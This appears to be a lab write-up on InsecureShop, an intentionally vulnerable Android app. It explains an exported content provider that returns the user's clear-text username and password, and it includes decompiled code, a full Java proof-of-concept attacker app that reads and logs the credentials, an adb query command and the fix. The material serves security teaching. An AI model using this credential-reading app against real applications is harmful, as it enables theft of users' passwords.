Insecure Content Provider

The content provider com.insecureshop.contentProvider.InsecureShopProvider is exported because its manifest entry sets android:exported="true". The only thing gating access to it is the read permission com.insecureshop.permission.READ:

<provider android:name="com.insecureshop.contentProvider.InsecureShopProvider" android:readPermission="com.insecureshop.permission.READ" android:exported="true" android:authorities="com.insecureshop.provider"/>

The decompiled onCreate() and query() methods of com.insecureshop.contentProvider.InsecureShopProvider look like this:

public boolean onCreate() {
    // UriMatcher(-1) is UriMatcher.NO_MATCH: match() returns -1 for unknown URIs
    android.content.UriMatcher uriMatcher2 = new android.content.UriMatcher(-1);
    uriMatcher = uriMatcher2;
    if (uriMatcher2 == null) {
        return true;
    }
    // content://com.insecureshop.provider/insecure is mapped to match code 100
    uriMatcher2.addURI("com.insecureshop.provider", "insecure", 100);
    return true;
}

public android.database.Cursor query(android.net.Uri uri, java.lang.String[] projection, java.lang.String selection, java.lang.String[] selectionArgs, java.lang.String sortOrder) {
    kotlin.jvm.internal.Intrinsics.checkParameterIsNotNull(uri, "uri");
    android.content.UriMatcher uriMatcher2 = uriMatcher;
    // Only the "insecure" path is served; any other URI gets a null cursor
    if (uriMatcher2 == null || uriMatcher2.match(uri) != 100) {
        return null;
    }
    // projection, selection and sortOrder are ignored: the caller always receives both columns
    android.database.MatrixCursor cursor = new android.database.MatrixCursor(new java.lang.String[]{"username", "password"});
    java.lang.String[] strArr = new java.lang.String[2];
    // Credentials are read from the app's Prefs singleton and returned in clear text
    java.lang.String username = com.insecureshop.util.Prefs.INSTANCE.getUsername();
    if (username == null) {
        kotlin.jvm.internal.Intrinsics.throwNpe();
    }
    strArr[0] = username;
    java.lang.String password = com.insecureshop.util.Prefs.INSTANCE.getPassword();
    if (password == null) {
        kotlin.jvm.internal.Intrinsics.throwNpe();
    }
    strArr[1] = password;
    cursor.addRow(strArr);
    return cursor;
}

The provider therefore answers any query for content://com.insecureshop.provider/insecure (the only URI registered with the UriMatcher) with a single row holding the logged-in user's username and password in clear text. Because the provider is exported, any other app on the device that can satisfy the readPermission can read those credentials. Whether that permission restricts anything depends on how com.insecureshop.permission.READ is declared: with a normal protectionLevel, any third-party app obtains it simply by listing it in its own manifest, and only a signature-level declaration would limit access to apps signed with the same key.
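A minimal attacker-side app that reads the credentials through the exported provider, as an added proof-of-concept that is not part of the original page or of InsecureShop. The package and class names (com.example.pocreader, ProviderLeakActivity) are assumptions; the authority, path and column names come from the manifest and code above.

```java
// Added PoC (not InsecureShop code): read the victim's credentials through the
// exported provider. Because the provider sets
// android:readPermission="com.insecureshop.permission.READ", this app must request
// that permission in its own AndroidManifest.xml:
//   <uses-permission android:name="com.insecureshop.permission.READ" />
// Package and class names below are assumptions made for this example.
package com.example.pocreader;

import android.app.Activity;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class ProviderLeakActivity extends Activity {
    private static final String TAG = "ProviderLeak";

    // authority from the manifest + the path registered with the UriMatcher (code 100)
    private static final Uri INSECURE_URI =
            Uri.parse("content://com.insecureshop.provider/insecure");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        Cursor cursor;
        try {
            // projection/selection/sortOrder are ignored by the provider, so pass null
            cursor = getContentResolver().query(INSECURE_URI, null, null, null, null);
        } catch (SecurityException e) {
            // Thrown when this app does not hold com.insecureshop.permission.READ,
            // i.e. the permission was declared with a signature protection level
            Log.e(TAG, "permission denied: " + e.getMessage());
            return;
        }

        // The provider returns null for any URI other than /insecure
        if (cursor == null) {
            Log.e(TAG, "null cursor: URI did not match or provider not reachable");
            return;
        }

        try {
            int userCol = cursor.getColumnIndexOrThrow("username");
            int passCol = cursor.getColumnIndexOrThrow("password");
            while (cursor.moveToNext()) {
                // One row is expected: the logged-in user's clear-text credentials
                Log.i(TAG, "username=" + cursor.getString(userCol)
                        + " password=" + cursor.getString(passCol));
            }
        } finally {
            cursor.close();
        }
    }
}
```

For a quick manual check without building an app, `adb shell content query --uri content://com.insecureshop.provider/insecure` issues the same query, but it runs as the shell user, which does not hold the app-defined permission, so it may be refused where the PoC app (which declares uses-permission) succeeds. The fix on the provider side is to stop exporting it (android:exported="false") or, if other apps legitimately need it, to declare com.insecureshop.permission.READ with android:protectionLevel="signature".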
